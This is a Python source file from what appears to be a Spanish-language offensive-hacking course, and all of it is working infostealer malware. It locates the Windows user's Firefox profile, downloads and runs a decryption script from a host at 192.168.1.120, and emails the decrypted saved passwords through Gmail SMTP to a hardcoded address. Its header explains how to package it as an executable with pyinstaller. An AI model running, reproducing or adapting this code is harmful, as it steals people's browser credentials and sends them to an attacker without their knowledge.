Curso-lenguaje-python/python-ofensivo/15_hacking/10_malware/03_malware.py

130 lines
2.8 KiB
Python
Raw Normal View History

2024-01-31 20:29:22 +01:00
#!/usr/bin/env python3
# coding: cp850
"""
Malware - firefox_decrypt.py
Firefox Decrypt https://github.com/unode/firefox_decrypt
La construcción del ejecutables es con pyinstaller y se ejecuta así:
pyinstaller --oneline malware.py
Para que funcione el .exe se debe harcodear el password y no usar dotenv
"""
import dotenv
import os
import requests
import subprocess
import sys
import smtplib
import tempfile
from email.mime.text import MIMEText
def run_command(command):
"""
Ejecutor de comandos
"""
try:
output_command = subprocess.check_output(command, shell=True)
return output_command.decode('cp850').strip()
except Exception as e:
print(f"\n[!] Error al ejecutar el comando {command}.\nError: {e}")
return None
def send_email(subject, body, sender, recipients, password):
"""
Envia un email con el reporte de teclas presionadas
"""
msg = MIMEText(body)
msg['Subject'] = subject
msg['From'] = sender
msg['To'] = ', '.join(recipients)
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
smtp_server.login(sender, password)
smtp_server.sendmail(sender, recipients, msg.as_string())
print(f"[i] Email sent Successfully!\n")
def get_firefox_profiles(username):
2024-02-01 01:26:21 +01:00
path = f"C:\\Users\\" + username + "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
2024-01-31 20:29:22 +01:00
try:
profiles = [profile for profile in os.listdir(
path) if "release" in profile]
return profiles[0] if profiles else None
except Exception as e:
print(f"\n[!] Error al obtener el profile de Firefox.\nError: {e}")
return None
def get_firefox_passwords(username, profiles):
r = requests.get("http://192.168.1.120/firefox_decrypt.py")
temp_dir = tempfile.mkdtemp()
os.chdir(temp_dir)
with open("firefox_decrypt.py", "wb") as f:
f.write(r.content)
command = f"python firefox_decrypt.py C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\{profiles}"
passwords = run_command(command)
os.remove("firefox_decrypt.py")
return passwords
if __name__ == '__main__':
username_str = run_command("whoami")
username = username_str.split("\\")[1]
profiles = get_firefox_profiles(username)
if not username or not profiles:
sys.exit(
f"\n[!] No ha sido posible obtener el nombre de usuario o el profile válido de firefox")
passwords = get_firefox_passwords(username, profiles)
if passwords:
dotenv.load_dotenv()
app_passwd = os.getenv("APP_PASSWD")
send_email(
"Decrypted Firefox Passwords INFO",
passwords,
"keyloggerseginf@gmail.com",
["keyloggerseginf@gmail.com"],
app_passwd
)
else:
print(f"[!] No se han encontrado contraseñas")